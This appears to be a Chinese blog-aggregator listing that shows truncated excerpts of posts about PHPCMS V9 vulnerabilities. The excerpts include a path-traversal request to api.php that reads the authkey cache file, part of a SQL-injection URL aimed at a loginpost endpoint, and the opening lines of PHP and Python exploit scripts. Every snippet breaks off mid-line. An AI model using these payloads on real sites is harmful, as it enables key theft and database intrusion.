台部落abu123

網址加/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\c

2018-09-12 06:21:51

獲取當前數據庫http://192.168.1.139:8080/phpcms/index.php?m=member&c=index&a=loginpost：forward=http%253A%252F%252F192.168.1.139%

2018-09-12 06:21:49

天小站發佈了PHPCMSV9 AuthKey泄露導致SQL注入的文章，熟悉本站的兄弟們都知道，今天可能就會發布EXP了，恭喜你，又猜對了。好久沒有寫PHP版的EXP了，這次再寫就已經基本忘光了，唉，花了好久的時間呀，最終還是完成了。其實使用

2018-09-12 06:21:48

漏洞的原理：具體的請看admin/global.php這個文件裏面關於用戶登陸部分的代碼，這裏截取一下。。。/*用戶登錄*/ if( $_POST[loginname] && $_POST[loginpwd] ) { if( $webdb

2018-09-12 06:21:48

#!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: gb2312 -*- # -*- coding: utf_8 -*- # author iswin import sys

2018-09-12 06:21:48

<?php set_time_limit(0); $wang_url = 'http://www.0day5.com'; $auth_key = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'; $str = "uid

2018-09-12 06:21:48

0x01:介紹PHPCMS V9（後面簡稱V9）採用PHP5+MYSQL做爲技術基礎進行開發。V9採用OOP（面向對象）方式進行基礎運行框架搭建。模塊化開發方式做爲功能開發形式。框架易於功能擴展，代碼維護，優秀的二次開發能力，可滿足所有網站

2018-09-12 06:21:46